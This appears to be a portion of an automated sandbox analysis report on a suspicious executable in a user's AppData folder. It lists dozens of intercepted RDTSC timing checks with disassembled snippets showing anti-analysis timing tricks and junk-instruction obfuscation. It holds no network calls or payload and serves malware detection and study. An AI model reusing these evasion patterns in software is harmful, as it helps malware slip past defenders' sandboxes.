Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C782EA second address: C78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0E948C9FB6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79E76 second address: C79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F53 second address: C79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F57 second address: C79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A043 second address: C7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A049 second address: C7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5C9 second address: C7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D3 second address: C7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D9 second address: C7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A7C6 second address: C7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7AE9D second address: C7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F0E948C9FB8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F0E948C9FBEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F0E948C9FB8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007F0E948C9FBCh 0x00000047 jp 00007F0E948C9FBCh 0x0000004d jnc 00007F0E948C9FB6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B954 second address: C7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B958 second address: C7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B95C second address: C7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7C8F5 second address: C7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC0h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D412 second address: C7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D1D3 second address: C7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE01 second address: C7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE05 second address: C7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB1F second address: C7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0E94F51A48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0E94F51A48h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7E869 second address: C7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB88 second address: C7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F65C second address: C7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F364 second address: C7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8469E second address: C846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846C1 second address: C846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A51h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846D7 second address: C846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393B9 second address: C393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393BF second address: C393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3B second address: C86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3F second address: C86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA1 second address: C8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8A07E second address: C8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA7 second address: C8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0E94F51A48h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007F0E94F51A4Bh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8905A second address: C89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8F686 second address: C8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F0E94F51A48h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8B22F second address: C8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90628 second address: C9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0E94F51A48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007F0E94F51A4Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165A second address: C9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165F second address: C91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4349A second address: C434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434B7 second address: C434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434BB second address: C434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0E948C9FD1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F0E948C9FBFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A14 second address: C94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A30 second address: C94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A3D second address: C94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C971EE second address: C971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9086C second address: C90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917DC second address: C917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90873 second address: C90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917E1 second address: C91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9911F second address: C99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0E94F51A4Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91804 second address: C91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C99148 second address: C991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0E94F51A4Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F0E94F51A48h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007F0E94F51A51h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C991A9 second address: C991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91808 second address: C9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0E94F51A4Ch 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F0E94F51A48h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007F0E94F51A4Ch 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007F0E94F51A48h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007F0E94F51A4Ch 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9189B second address: C918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9730C second address: C97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97310 second address: C97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97314 second address: C9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9731A second address: C973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E948C9FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0E948C9FB8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F0E948C9FB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007F0E948C9FBFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007F0E948C9FBCh 0x0000006d je 00007F0E948C9FBCh 0x00000073 je 00007F0E948C9FB6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007F0E948C9FB8h 0x00000083 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973BE second address: C973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A51h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973D3 second address: C973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E40E second address: C9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E42C second address: C9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FBEh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E469 second address: C3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E470 second address: C3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E47B second address: C3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA21BD second address: CA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA68FF second address: CA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9009 second address: CA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F0E948C9FC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9044 second address: CA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C32AD2 second address: C32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD183 second address: CAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0E94F51A46h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8AC second address: CAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B0 second address: CAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B4 second address: CAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E948C9FBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8CA second address: CAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D0 second address: CAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D4 second address: CAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
